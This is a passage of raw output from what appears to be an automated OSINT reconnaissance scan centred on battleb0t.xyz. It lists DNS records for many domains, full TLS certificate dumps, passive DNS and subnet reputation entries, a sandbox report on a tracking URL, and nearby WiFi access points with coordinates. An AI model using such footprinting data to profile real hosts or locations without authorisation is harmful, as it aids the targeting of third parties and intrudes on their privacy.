{"record_type": "CNAME", "resolved_at": "2023-04-24T22:30:03.738257685Z"}, "weili512.github.io": {"record_type": "AAAA", "resolved_at": "2023-03-02T16:30:29.884086670Z"}, "resume.chann.dev": {"record_type": "CNAME", "resolved_at": "2023-03-20T16:16:20.658403265Z"}, "www.wazted.fr": {"record_type": "CNAME", "resolved_at": "2023-05-11T17:32:27.312675959Z"}, "zdf.zerodarktech.com": {"record_type": "CNAME", "resolved_at": "2023-01-04T12:37:43.534076338Z"}, "www.mtconnectcore.dev": {"record_type": "CNAME", "resolved_at": "2023-03-16T14:59:11.184709249Z"}, "www.mikezalik.com": {"record_type": "CNAME", "resolved_at": "2023-01-30T13:35:57.247139345Z"}, "shortcuts.bludood.com": {"record_type": "CNAME", "resolved_at": "2022-10-27T13:10:37.241256116Z"}, "www.aloha.org.cn": {"record_type": "CNAME", "resolved_at": "2022-12-14T12:40:48.602824216Z"}, "ivanleeswe.github.io": {"record_type": "AAAA", "resolved_at": "2023-03-14T00:28:16.302626796Z"}, "www.williamjang.dev": {"record_type": "CNAME", "resolved_at": "2023-03-11T15:47:39.271340346Z"}, "www.mangato.es": {"record_type": "CNAME", "resolved_at": "2023-04-22T16:31:05.591550189Z"}, "msk.im": {"record_type": "AAAA", "resolved_at": "2023-05-09T17:24:25.369430576Z"}, "stevenbone.dev": {"record_type": "AAAA", "resolved_at": "2023-04-20T02:37:36.462044411Z"}, "www.dwivedula.dev": {"record_type": "CNAME", "resolved_at": "2023-03-07T15:37:48.541873098Z"}, "www.ousmane.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T15:03:29.723057364Z"}, "www.shira.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T17:45:59.585738764Z"}, "www.codenotes.dev": {"record_type": "CNAME", "resolved_at": "2023-04-02T01:42:40.361559321Z"}, "www.thyagajan.in": {"record_type": "CNAME", "resolved_at": "2023-02-04T15:11:06.016790048Z"}, "haoyan.vin": {"record_type": "CNAME", "resolved_at": "2023-03-24T21:40:03.224812796Z"}, "www.sangjunchun.com": {"record_type": "CNAME", "resolved_at": "2023-05-07T15:42:03.799026511Z"}, "www.lawrencedunbar.dev": {"record_type": "CNAME", "resolved_at": "2023-03-08T15:50:22.533060749Z"}, "www.gilsoffer.com": {"record_type": "CNAME", "resolved_at": "2023-03-18T21:22:12.068548907Z"}, "www.jenniwu.dev": {"record_type": "CNAME", "resolved_at": "2023-04-24T17:00:00.073227865Z"}, "www.coltonfalkner.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T19:22:40.169282211Z"}, "andressa.dev": {"record_type": "CNAME", "resolved_at": "2023-04-13T16:15:01.948884742Z"}, "www.dangillis.dev": {"record_type": "CNAME", "resolved_at": "2023-03-05T15:53:20.930987816Z"}, "www.jasonscotto.dev": {"record_type": "CNAME", "resolved_at": "2023-03-16T04:01:31.543104004Z"}, "volnt.github.com": {"record_type": "CNAME", "resolved_at": "2023-04-18T12:15:25.538707631Z"}, "www.ologn.dev": {"record_type": "CNAME", "resolved_at": "2023-02-14T15:37:29.279040979Z"}, "www.sreehari.dev": {"record_type": "CNAME", "resolved_at": "2023-03-14T15:27:59.231327405Z"}, "www.jenniferyaya.ca": {"record_type": "CNAME", "resolved_at": "2023-05-11T12:50:41.791793242Z"}, "proofcafe.github.com": {"record_type": "CNAME", "resolved_at": "2023-02-21T14:18:15.798052993Z"}, "mirror.growingio.design": {"record_type": "CNAME", "resolved_at": "2022-12-20T14:28:15.483007528Z"}, "www.framy.dev": {"record_type": "CNAME", "resolved_at": "2023-03-04T15:55:45.611656444Z"}, "www.colorbuilder.dev": {"record_type": "CNAME", "resolved_at": "2023-03-17T15:48:32.011890468Z"}, "www.oscarablinger.dev": {"record_type": "CNAME", "resolved_at": "2023-05-01T09:06:38.146245867Z"}, "abeziou.dev": {"record_type": "AAAA", "resolved_at": "2023-03-27T23:40:41.232028838Z"}, "fosterinfotech.com": {"record_type": "AAAA", "resolved_at": "2023-04-15T14:30:18.377726429Z"}, "www.johndal.com": {"record_type": "CNAME", "resolved_at": "2023-03-18T21:34:43.427896647Z"}, "shop4data-ui.docs.collibra.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T00:18:31.647476511Z"}, "www.codar.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T07:54:18.450070838Z"}, "www.ky1vstar.dev": {"record_type": "CNAME", "resolved_at": "2023-03-11T15:47:22.392376650Z"}, "portfolio.gchahm.dev": {"record_type": "CNAME", "resolved_at": "2023-01-14T14:40:10.714963428Z"}}, "names": ["www.yusry.de", "database.jiny.dev", "www.sreehari.dev", "www.jenniwu.dev", "abeziou.dev", | 2606:50c0:8000::153 |
| 2023-05-12 03:01:23 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.218): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:46:38 | BGP AS Membership | No | RIPE | 0 | 0 | 3 | 0 | None | 36459 | 185.199.111.0/24 |
| 2023-05-12 03:03:16 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | panel.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:4a:0e:8c:1b:d3:a5:34:69:b6:32:8e:46:29:d8:95:17:d9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 09:44:04 2022 GMT
Not After : Feb 15 09:44:03 2023 GMT
Subject: CN=panel.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:ae:fd:f2:48:0f:df:bc:e1:99:1b:6f:bd:c7:77:
53:7a:c0:8b:77:cd:2c:3c:60:53:e0:e9:b0:a7:7b:
73:98:97:7e:b8:eb:d6:f1:08:7b:2c:70:98:ff:62:
24:3a:e4:75:75:15:64:3c:f3:10:df:1f:74:86:c2:
03:e3:19:f8:ee:1b:1c:a4:33:45:b3:b5:bd:cc:36:
58:4b:c6:53:5a:e5:a0:83:1c:13:b6:0a:f0:09:85:
49:e2:af:1f:59:f3:45:35:c5:76:d8:d7:03:6b:48:
2d:81:71:8d:d8:b6:9f:ca:3d:be:a5:d1:d0:6d:84:
3f:57:a3:f9:3b:33:48:5e:3a:10:1b:9a:8e:0e:52:
e4:41:61:32:48:9e:eb:dd:91:27:08:98:23:0d:d6:
40:40:46:c6:2e:72:9b:5e:7b:a7:ce:14:5c:e3:33:
d1:e0:7f:e9:bf:c8:04:bf:dd:c3:5b:ec:18:53:dc:
e8:49:50:75:f5:f6:57:2f:90:7f:b7:6a:c4:1e:bc:
3e:2d:04:87:d0:de:ec:72:7e:5e:84:cf:77:05:c4:
81:0d:1d:68:c9:a6:7c:75:bd:ed:fa:cd:4e:88:39:
5c:0c:10:a3:f5:6d:4b:7d:20:b4:0a:24:fb:93:43:
e5:9b:70:b2:e4:95:89:06:02:90:7a:2d:6f:c2:fa:
77:78:2c:13:6f:d6:08:02:00:eb:f1:d0:25:de:0b:
0c:36:d6:0b:0b:8d:58:6f:b7:29:51:a7:c3:27:fb:
ab:fa:3f:bd:88:88:4d:63:79:00:4e:5f:ea:ff:bf:
a7:e5:c8:b9:01:b0:11:55:38:c5:2c:12:42:ec:9f:
41:d5:d8:5b:cb:0e:56:2f:f5:0b:5b:b2:1f:2e:4b:
1c:7b:f3:b8:8f:a3:2a:22:10:32:70:e5:ff:92:c9:
9d:cf:f4:1c:87:80:7b:03:c4:11:f8:c8:fe:1d:fd:
d9:21:53:2a:ab:a4:e1:88:2f:4b:5d:2f:ee:62:ac:
58:24:c3:6b:51:75:98:92:28:85:71:19:cf:1f:32:
bf:04:e0:46:cb:6a:6e:1a:53:77:bb:51:7b:25:a8:
3b:79:a4:fe:31:da:29:cb:94:14:d8:b7:bf:23:48:
40:7c:38:77:e2:71:aa:43:c0:dd:58:a7:d1:0f:28:
19:e1:e9:99:2b:f4:ba:45:c8:6a:f8:d6:7a:86:7e:
a9:1e:96:ed:9c:c8:12:b9:05:83:95:70:08:f4:a3:
69:c3:37:93:d6:82:c5:85:91:d6:07:1b:87:31:af:
f4:29:c3:da:2f:cb:d0:72:02:68:65:19:d7:78:65:
82:75:d2:3a:e3:90:30:94:d9:d7:ad:e9:8d:db:16:
21:a3:69
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
40:6C:27:E5:F5:7A:53:84:B0:9C:FE:C0:1C:53:80:B3:F8:A3:C2:C8
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:panel.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
31:e8:ef:7b:dc:32:84:dd:2e:cc:16:1c:67:37:d9:86:76:04:
cf:c1:4a:db:fc:f8:35:75:ae:c3:16:b4:0f:be:85:8b:2e:20:
db:eb:90:53:b8:18:4d:ef:7f:9f:02:58:b1:11:60:70:ce:ed:
48:d1:03:e8:96:d0:08:23:48:86:a6:a1:dd:67:5c:22:34:8f:
7b:e9:55:8c:27:c1:a3:38:4d:9e:0d:fe:62:f2:2a:c2:c8:2a:
7f:a8:e9:c9:39:5d:dd:14:84:0b:ca:c2:43:a5:28:2d:bf:3e:
df:33:fa:93:d0:d2:25:aa:bf:96:26:a0:e2:28:49:c3:01:f6:
1b:1f:83:32:9b:6e:57:55:9b:b2:74:7a:0d:c6:40:a1:6f:35:
c4:08:94:e4:ae:84:9e:57:8b:d7:39:a4:95:6f:4e:9a:ff:c5:
d4:c6:a2:ec:49:72:ad:a2:fe:9d:76:83:15:0f:a5:d6:70:72:
bc:54:bb:e6:d0:4d:78:23:d8:86:e5:91:24:e1:d6:5c:9f:c0:
4f:96:79:66:56:47:4e:a5:83:46:6a:88:fc:1a:f6:c8:24:7e:
cc:fc:53:86:95:72:5f:4e:3c:48:0d:0e:f3:6a:43:f6:6b:fb:
f5:6b:36:26:89:53:4a:22:4b:a7:9e:de:e2:c4:fb:85:8c:ca:
ff:01:95:cd
|
| 2023-05-12 02:44:39 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:03:e6:77:f0:fb:1d:de:0e:93:d2:d9:e5:40:98:fb:b1:42
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=Let's Encrypt, CN=E1
Validity
Not Before: Nov 17 08:07:50 2022 GMT
Not After : Feb 15 08:07:49 2023 GMT
Subject: CN=*.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:b1:ca:c5:7f:45:88:ea:f6:98:9e:7e:93:33:29:
bd:74:fc:48:fe:29:e9:2a:62:8c:97:f1:93:16:6f:
19:da:24:7c:94:17:6e:35:5b:b2:ef:eb:77:ee:6f:
68:a3:10:bb:0d:f6:01:57:78:db:8f:85:23:65:1b:
8d:5a:d8:02:5e
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
26:F8:75:40:42:15:34:A1:4E:96:C0:96:27:7F:34:DA:52:69:CF:39
X509v3 Authority Key Identifier:
keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC
Authority Information Access:
OCSP - URI:http://e1.o.lencr.org
CA Issuers - URI:http://e1.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 6F:53:76:AC:31:F0:31:19:D8:99:00:A4:51:15:FF:77:
15:1C:11:D9:02:C1:00:29:06:8D:B2:08:9A:37:D9:13
Timestamp : Nov 17 09:07:51.072 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:16:9A:44:87:BF:E8:FB:88:4F:27:C3:23:
D7:41:4A:F8:BC:44:42:20:18:B7:8C:EF:CD:C8:5C:14:
86:9C:04:8F:02:21:00:D8:FC:B1:DA:CE:C1:81:91:75:
82:10:9B:4A:3A:12:1B:FE:70:80:7F:A6:84:E4:C5:04:
58:38:0B:34:F3:1E:73
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Nov 17 09:07:51.066 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:15:CD:95:9A:3C:F7:20:93:54:3E:08:F7:
6D:D4:73:9D:63:2C:14:38:C7:1C:15:38:7A:3E:1C:B5:
3A:C9:C0:A8:02:21:00:C8:7B:89:3A:AC:D8:F0:69:E9:
DE:74:9E:7E:74:A9:4E:43:C7:89:2C:62:13:65:90:95:
4A:78:C6:0D:71:91:72
Signature Algorithm: ecdsa-with-SHA384
30:65:02:30:19:f9:7b:55:14:7a:4c:2b:b8:a8:55:31:bc:66:
14:95:52:8a:fe:84:4c:61:c2:02:53:4a:80:96:e1:54:a7:b8:
65:6c:70:ad:b8:e9:f0:44:9d:f5:1e:5f:f5:49:05:26:02:31:
00:af:38:a6:7e:99:e5:40:3e:28:0a:04:fc:e6:28:1e:0b:3b:
f4:a2:30:3a:2a:98:5c:14:93:92:27:5b:5b:a6:49:e2:da:ff:
a7:8f:34:6f:32:35:7e:32:3c:5a:8b:ec:81
|
| 2023-05-12 02:53:15 | IPv6 Address | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | 2606:50c0:8003::153 | battleb0t.xyz |
| 2023-05-12 02:54:14 | Linked URL - Internal | No | Web Spider | 0 | 0 | 2 | 0 | None | http://kekw.battleb0t.xyz/ | kekw.battleb0t.xyz |
| 2023-05-12 02:53:38 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://url1021.joinpreventor.com/ls/click?upn=bna4-2BmY1ITDZjl0PQKir67uPPI2f2DxWOATqx3-2Fj7OYylB8Hflza-2F4c-2BTJ51THm64bMitYJMpTuBxoVK0JwiPA-3D-3D6SWF_2XvlAmvoAz3TtepUWzZ-2Fg6Vtpb0zElD-2BU8dA0uWhdmvWpUzFQRCBLPcsU5at7iOPzNbZzyRCb5bSh-2BoMMyAUQdyJp9IV2xfegy0-2FMwvEi-2BwozwcLtcNHqHaMRs8zAm7v5oZ8wTMu7PUckSXiY1wEtrZaBDs-2BRBlmkbh9Bk665yd-2BGWxPZ3Mu0THZQM5-2FP11a-2BnjrPp01kRk3vpw-2FdkIVAY0zBticO8G8HkRCeTwIfKT9zQaL08iSXP09g4bM6aPaqGqiABBypIWkMX9voaonye-2FhTvmhVbMfIPyNM6dFuHHhzzLGrIVXSKSF6E-2BOGRIfxfAxK931o54RTlE-2B0snfd2QGewW05SsfFlJqS7DRs1HkS583lpCQaj-2FK4Iy1YDRwJnFPS5MjbvltaPnLRwriSR-2Fb5JG4SDVEinnEWy4pnM4-3D', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_b40_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "UpdatingNewTabPageData"\n "IsoScope_b40_IESQMMUTEX_0_331"\n "IsoScope_b40_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_b40_ConnHashTable<2880>_HashTable_Mutex"\n "IsoScope_b40_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_b40_IE_EarlyTabStart_0x914_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2880"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2880"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"167.89.123.124:80"\n "52.11.45.250:443"\n "13.227.74.22:443"\n "142.250.188.10:443"\n "52.202.168.65:443"\n "185.199.109.153:443"\n "13.227.21.110:443"\n "13.227.74.87:443"\n "157.240.22.25:443"\n "136.143.191.67:443"\n "142.250.189.163:443"\n "13.227.74.48:443"\n "91.199.212.52:80"\n "136.143.191.144:443"\n "204.141.43.48:443"\n "136.143.190.97:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"url1021.joinpreventor.com"\n "crt.usertrust.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ajax.googleapis.com"\n "connect.facebook.net"\n "crt.usertrust.com"\n "css.zohocdn.com"\n "d3e54v103j8qbb.cloudfront.net"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "js.zohocdn.com"\n "maciejsawicki.com"\n "preventor.com"\n "salesiq.zoho.com"\n "salesiq.zohopublic.com"\n "script.hotjar.com"\n "static.hotjar.com"\n "uploads-ssl.webflow.com"\n "url1021.joinpreventor.com"\n "vts.zohopublic.com"\n "www.bugherd.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"src="https://www.facebook.com/tr?id=2116198561850213&ev=PageView" (Indicator: "facebook.com"), "</style><meta name="twitter:card" content="summary" />" (Indicator: "twitter"), "<meta name="twitter:site" content="@Preventorft" />" (Indicator: "twitter"), "{state:0\ntransportUrl:b\ncontext:c\nparent:Wk()}\nP(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+Jh.ja+"&cx=c";Tr()&&(f+="&sign="+Jh.Xe);var g=Sh||ci?Sr(b,f):void 0;g||(g=Fo("https://","http://",Jh.ze+f));Qk().destination[a]={state:1\ncontext:c\nparent:Wk()};mc(g)}};function Ur(){if(Ok()){return!0}return!1};var Xr=new RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/)\nYr={cl:["ecl"]\ncustomPixels:["nonGooglePixels"]\necl:["cl"]\nehl:["hl"]\nhl:["ehl"]\nhtml:["customScripts"\n"customPixels"\n"nonGooglePixels"\n"nonGoogleScripts"\n"nonGoogleIframes"]\ncustomScripts:["html"\n"customPixels"\n"nonGooglePixels"\n"nonGoogleScripts"\n"nonGoogleIframes"]\nnonGooglePixels:[]\nnonGoogleScripts:["nonGooglePixels"]\nnonGoogleIframes:["nonGooglePixels"]}\nZr={cl:["ecl"]\ncustomPixels:["customScripts"\n"html"]\n" (Indicator: "youtube"), "var Jv=function(a,b,c){function d(){var g=a();f+=e?(Ua()-e)*g.playbackRate/1E3:0;e=Ua()}var e=0\nf=0;return{createEvent:function(g,h,m){var n=a()\np=n.Lg\nq=void 0!==m?Math.round(m):void 0!==h?Math.round(n.Lg*h):Math.round(n.Pi)\nr=void 0!==h?Math.round(100*h):0>=p?0:Math.round(q/p*100)\nt=G.hidden?!1:.5<=Pi(c);d();var u=void 0;void 0!==b&&(u=[b]);var v=lv(c,"gtm.video",u);v["gtm.videoProvider"]="youtube";v["gtm.videoStatus"]=g;v["gtm.videoUrl"]=n.url;v["gtm.videoTitle"]=n.title;v["gtm.videoDuration"]=" (Indicator: "youtube"), "b\n"vert.pix");break;case "PERCENT":qy(d.verticalThresholds,b,"vert.pct")}pv("sdl","init",!1)?pv("sdl","pending",!1)||I(function(){return ry()}):(nv("sdl","init",!0)\nnv("sdl","pending",!0)\nI(function(){ry();if(sy()){var e=ty();qc(z,"scroll",e);qc(z,"resize",e)}else nv("sdl","init",!1)}));return b}xy.N="internal.enableAutoEventOnScroll";var cc=ea(["data-gtm-yt-inspected-"])\nyy=["www.youtube.com"\n"www.youtube-nocookie.com"]\nzy\nAy=!1;" (Indicator: "youtube"), "m=!!a.get("fixMissingApi");if(!(d||e||f||g.length||h.length))return;var n={Gg:d\nEg:e\nFg:f\nlh:g\nmh:h\nWd:m\nib:b}\np=z.YT\nq=function(){Gy(n)};if(p)return p.ready&&p.ready(q)\nb;var r=z.onYouTubeIframeAPIReady;z.onYouTubeIframeAPIReady=function(){r&&r();q()};I(function(){for(var t=G.getElementsByTagName("script")\nu=t.length\nv=0;v<u;v++){var w=t[v].getAttribute("src");if(Jy(w,"iframe_api")||Jy(w,"player_api"))return b}for(var x=G.getElementsByTagName("iframe")\ny=x.length\nA=0;A<y;A++)if(!Ay&&Hy(x[A],n.Wd))return mc("https://www.youtube.com/iframe_api")\n" (Indicator: "youtube"), "Ay=!0\nb});return b}Ky.N="internal.enableAutoEventOnYouTubeActivity";var Ly;function My(a){var b=!1;return b}My.N="internal.evaluateMatchingRules";" (Indicator: "youtube"), "GET /5f774172772fc1fb1fa10c12/5f774173a2f6f80a3d80d3be_twitter.png HTTP/1.1Accept: image/png\n image/svg+xml\n image/*;q=0.8\n */*;q=0.5Referer: https://preventor.com/solutions/preventor-namesAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip\n deflateHost: uploads-ssl.webflow.comDNT: 1Connection: Keep-Alive" (Indicator: "twitter"), "GET /5f774172772fc1fb1fa10c12/606cb3a9126777b98ff68805_icon-youtube.png HTTP/1.1Accept: image/png\n image/svg+xml\n image/*;q=0.8\n */*;q=0.5Referer: https://preventor.com/solutions/preventor-namesAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip\n deflateHost: uploads-ssl.webflow.comDNT: 1Connection: Keep-Alive" (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarFB80.tmp" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"5f774173a2f6f8720a80d3d7_decor-dots_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "6305c4d0e96629fb1faee847_mob_app%20store_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "6305c4d096183ee5c61f2081_mob_google%20play_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5ff60f8b3be007f3ef5780f3_Cover%20AML%20risk%20screening_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5f774173a2f6f8ffce80d3d6_decor-rows_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5ff5c5146d1b1ad22260e36b_seamless-integration_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2c611b6f7021b7a90b6_nav-healthcare_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2b5847afb666a7db5b8_nav-kyb_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5ff61e3603c269bbe2a4fd83_Powerfull-transactions_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2ac6d2755267bbee952_nav-anti-money-laundering_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "63c5d399b50c403dd6ef8a71_icon_solutions_1_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2c51ee3b2917a9fc9d3_nav-financial-services_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2c73c18f306a879a966_nav-law_1_.sv | 185.199.109.153 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | ELSA1 (Net ID: 00:02:2D:21:83:7A) | 50.1188, 8.6843 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | XFBSECA7HE6H (Net ID: 00:0D:67:66:08:15) | 32.8608, -79.9746 |
| 2023-05-12 03:10:05 | Co-Hosted Site - Domain Name | No | DNS Resolver | 2 | 0 | 4 | 0 | None | ecash-pay.com | donation.ecash-pay.com |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | J-Snijders (Net ID: 00:0C:F6:25:03:E8) | 50.8897, 6.0563 |
| 2023-05-12 02:46:33 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:a2:98:ee:7c:0f:82:53:85:c9:ed:86:47:94:a7:aa:74:64
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 27 17:54:05 2023 GMT
Not After : Apr 27 17:54:04 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:d2:cd:d6:7e:84:63:03:a9:a4:54:af:d4:a6:67:
cf:f7:3e:0c:ab:80:9d:a8:22:bf:ee:64:c0:1e:dd:
e1:9d:29:3b:aa:bb:b6:1a:dd:d0:c3:5d:15:61:c8:
eb:00:a8:62:02:a5:c4:0c:4d:3a:56:20:d3:19:1c:
24:d9:21:05:da:7b:34:cd:5b:3f:9f:3f:ff:56:cb:
60:a2:2a:6a:1f:63:a5:f7:6c:bc:e6:cd:4b:7c:cb:
c6:0b:ba:27:31:61:c2:7b:47:19:7b:f1:52:41:68:
44:d8:1a:a5:11:c2:d5:cd:2d:49:92:07:b0:5c:c3:
2d:0c:54:f4:e5:8e:0a:3e:0a:05:99:5f:e9:65:18:
80:c0:5e:b2:87:08:2d:60:b2:01:35:c9:41:a1:4e:
56:80:bc:0b:2d:89:62:c9:e1:19:f4:a9:de:a5:de:
27:dd:96:99:29:26:9e:36:03:45:4b:bf:4a:de:ef:
5f:47:82:05:6f:ed:a1:4f:34:05:75:05:59:d0:32:
a2:22:c4:9d:5a:65:cd:6b:45:d7:7f:45:90:2e:36:
4c:3d:0a:62:83:36:a6:3c:d9:df:00:c7:cb:10:68:
6e:0c:d8:9c:a6:a5:e6:32:7b:12:0d:1c:1f:90:20:
a5:a7:c9:da:be:0f:96:fe:30:6b:29:55:ac:4a:68:
7b:12:dd:43:df:cf:f5:49:87:8c:9b:38:92:62:52:
c6:f8:97:d4:43:d6:ed:cb:66:79:5b:c9:60:9e:db:
33:f0:59:fb:fd:35:62:83:55:b5:65:04:20:55:ee:
82:6d:de:85:c1:18:ed:8c:10:29:47:46:ee:2a:eb:
57:cd:b1:5e:14:a7:37:00:58:3a:35:9d:fe:99:73:
